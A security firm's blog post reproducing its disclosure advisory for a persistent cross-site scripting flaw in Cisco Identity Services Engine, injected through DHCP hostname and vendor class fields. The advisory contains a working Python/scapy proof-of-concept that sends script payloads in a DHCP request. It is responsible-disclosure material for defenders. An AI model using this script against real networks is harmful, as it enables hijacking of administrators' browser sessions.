2020-02-19

More security brings more insecurity

modzero found a vulnerability in the Cisco Identity Services Engine (ISE) environment, which allows arbitrary participients of a network to inject arbitrary JavaScript payload right into the administrative webpage of the Cisco ISE administration interface.

CISCO ISE is considered to enhance the overall network security, by limiting access to local area networks. Arbitrary users using DHCP as a yet anonymous participent are able to exploit weaknesses in Cisco's administrative interfaces and thus by-pass the increased security level:

The hostname and the vendor_class_id options of any DHCP request can be abused to inject malicious payload to execute code in the context of the browser of the administator, connecting to the Web interface. Further details and a PoC are available in our advisory.

Direct Link: https://www.modzero.com/advisories/MZ-19-03-CISCO-ISE.txt

----------------------------------------------------[MZ-19-03]----v1.2--

modzero Security Advisory:

Unauthenticated persistent cross-site scripting injection into the
administrative console of CISCO ISE web application via DHCP request

------------------------------------------------------------------------

------------------------------------------------------------------------

1. Timeline

------------------------------------------------------------------------

* 2019-11-22: Advisory sent to Cisco PSIRT psirt@cisco.com
* 2019-11-22: PSIRT opened case (PSIRT-0535851956) 
* 2019-11-22: PSIRT communicated tentative publishing date '2020-02-19'
* 2020-02-12: PSIRT incident manager confirmed reproduceability
* 2020-02-12: Received an unofficial CVE Number CVE-2020-3156
* 2020-02-19: modzero released advisory to the public

In  accordance  with  modzero's  disclosure  policy,  the  advisory  is
expected  to  be published  not  later than  February  21st, 2020.  Our
disclosure policy is available at:

https://www.modzero.ch/static/modzero_Disclosure_Policy.pdf

------------------------------------------------------------------------

2. About

------------------------------------------------------------------------

Affected vendor: Cisco
Latest known to be vulnerable version products:
    * Cisco Identity Services Engine version 2.6.0.156, Patch 2,3
      - Product Identifier: SNS-3655-K9
      - Version Identifier A0
      - ADE-OS Version 3.0.5.144

The Cisco Identity Services Engine is the engine behind Cisco's Network
Access Control  solution. It  enables the  creation and  enforcement of
security and access policies for endpoint devices connected to the
company's routers and switches. 

------------------------------------------------------------------------

3. Details

------------------------------------------------------------------------

An unauthenticated attacker who is  able to inject a specially  crafted
DHCP  request  packet into  the  network controlled  by  Cisco Identify
Service  Engine  (ISE),  is  able to  persistently  store  code  (e. g.
JavaScript),  which  is  executed in  the  context  of the  Web-browser
accessing the Web-based management interface.

The vulnerability is due to insufficient validation and encoding of the
attacker-controllable  input  within  the  hostname  and  vendor  class
identifier field of processed DHCP request packets.

The attacker-controlled  code will  be executed  in the  context of the
user  of the  Web-based management  console. If  a legitimate  user is
reviewing  an  Endpoint's  attributes  within  the  Identity   Services
Engine's Web- based-management-interface.

The attacker-controlled  code will  be executed  in the  context of the
user that is currently logged  in to the Web-based management  console,
when  the  endpoint  attribute  details  are  reviewed  by  opening the
following
URL: 

https://ISESRV/admin/login.jsp#context_dir/context_dir_devices/endpointDetails

------------------------------------------------------------------------

4. Impact

------------------------------------------------------------------------

The code will be executed with the rights of the user accessing the Web-
based management console. If the user has administrative rights, the
attacker might be able to leverage arbitrary functions of the Web-based
management interface.

------------------------------------------------------------------------

5. Proof of Concept exploit

------------------------------------------------------------------------

Using the following python script, two simple JavaScript code fragments 
will be sent in the hostname and vendor class identifier fields of the
DHCP request. 

#!/usr/bin/env python

from scapy.all import *
import scapy

conf.iface = "eth0"
hostname_payload = "<script>alert('hostname payload')</script>"
vendor_class_id_payload = "<script>alert('v class id payload')</script>"

_, hw   = get_if_raw_hwaddr(conf.iface)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=hw, type=0x800)
ip       = IP(src ='0.0.0.0', dst='255.255.255.255')
udp      = UDP (sport=68, dport=67)
bootp    = BOOTP(op=1, chaddr=hw)
dhcp     = DHCP(options=[("message-type","request"), \
    ("hostname",hostname_payload),("vendor_class_id", \
    vendor_class_id_payload),('end')])

packet   = ethernet / ip / udp / bootp / dhcp

sendp(packet, iface=conf.iface)

Once a person reviews the attributes of an endpoint within the ISE web-
based management interface the code will be executed.

------------------------------------------------------------------------

6. Workaround

------------------------------------------------------------------------

-

------------------------------------------------------------------------

7. Fix

------------------------------------------------------------------------

No software updates are available yet.

------------------------------------------------------------------------

8. Credits

------------------------------------------------------------------------

 * Max Moser 
 * Katharina Maennle

------------------------------------------------------------------------

9. About modzero

------------------------------------------------------------------------

The independent company modzero assists clients with security  analysis
in  the  complex areas   of  computer technology.  The  focus  lies  on
highly   detailed   technical  analysis   of   concepts,  software  and
hardware  components  as  well   as  the  development  of    individual
solutions.  Colleagues   at modzero  work   exclusively in   practical,
highly technical computer-security areas and can draw on decades of
experience in various platforms, system concepts, and designs.

Website: https://www.modzero.ch
E-Mail: contact@modzero.ch

------------------------------------------------------------------------

10. Disclaimer

------------------------------------------------------------------------

The information in the advisory is believed to be accurate at the time
of publishing  based on  currently available  information. Use  of the
information  constitutes acceptance  for use  in an  AS IS  condition.
There are no warranties with  regard to this information. Neither  the
author  nor  the  publisher  accepts  any  liability  for  any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.


Posted by modzero | Permanent link | File under: security, software, hacking, cisco, exploit, advisory